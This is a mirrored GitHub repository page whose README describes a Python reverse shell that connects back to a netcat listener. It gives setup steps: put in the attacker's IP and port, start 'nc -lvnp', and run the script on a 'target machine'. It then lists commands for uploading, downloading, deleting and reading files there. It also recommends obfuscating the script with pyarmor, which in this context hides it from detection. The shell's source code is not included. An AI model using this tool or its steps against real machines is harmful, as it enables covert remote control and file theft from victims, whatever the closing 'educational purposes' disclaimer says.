https://github.com/anonymousx46/reverse-shell
Python Reverse Shell with Netcat
https://github.com/anonymousx46/reverse-shell
netcat obfuscator python reverse-shell
Last synced: 6 months ago
JSON representation
Python Reverse Shell with Netcat
- Host: GitHub
- URL: https://github.com/anonymousx46/reverse-shell
- Owner: ANONYMOUSx46
- License: mit
- Created: 2025-02-15T21:44:08.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2025-03-30T00:58:40.000Z (6 months ago)
- Last Synced: 2025-03-30T01:37:16.216Z (6 months ago)
- Topics: netcat, obfuscator, python, reverse-shell
- Language: Python
- Homepage:
- Size: 5.86 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Created By ANONYMOUSx46
## Python Coded Revese Shell:


A Python-based reverse shell script that works seamlessly with the Kali Linux tool **netcat**. This script allows you to establish a remote connection to a machine, execute commands, and transfer files. The code can also be run through an obfuscator tool for added security.
## Prerequisites
- Python 3.x
- Kali Linux with netcat installed
- Obfuscator tool (optional)## Installation
1. **Clone the repository:**
```bash
git clone https://github.com/yourusername/Reverse-shell.git
cd Reverse-shell
```2. **Configure the server address and port:**
Edit the Python script to set your server's IP address and port:
```python
server_address = 'YOUR_SERVER_IP'
server_port = YOUR_SERVER_PORT
```3. **Run the script:**
```bash
python3 Rev3.py
```## Usage
1. **Set up the listener on your Kali Linux machine:**
```bash
nc -lvnp
```Replace `` with the port number you configured in the Python script.
2. **Run the reverse shell script on the target machine:**
```bash
python3 Rev3.py
```3. **Available Commands:**
- `quit`: Exit the reverse shell.
- `clear`: Clear the terminal screen.
- `cd `: Change the current directory.
- `set =`: Set an environment variable.
- `upload `: Upload a file to the target machine.
- `download `: Download a file from the target machine.
- `rm `: Remove a file from the target machine.
- `mkdir `: Create a directory on the target machine.
- `cat `: Read a file's contents.
- `python `: Execute a Python script.## Obfuscation (Optional)
For added security, you can run the script through an obfuscator tool. One popular option is [pyarmor](https://pypi.org/project/pyarmor/).
1. **Install pyarmor:**
```bash
pip install pyarmor
```2. **Obfuscate the script:**
```bash
pyarmor pack -x " --exclude obf " reverse_shell.py
```## Disclaimer
This project is intended for educational purposes only. The author is not responsible for any misuse of this tool.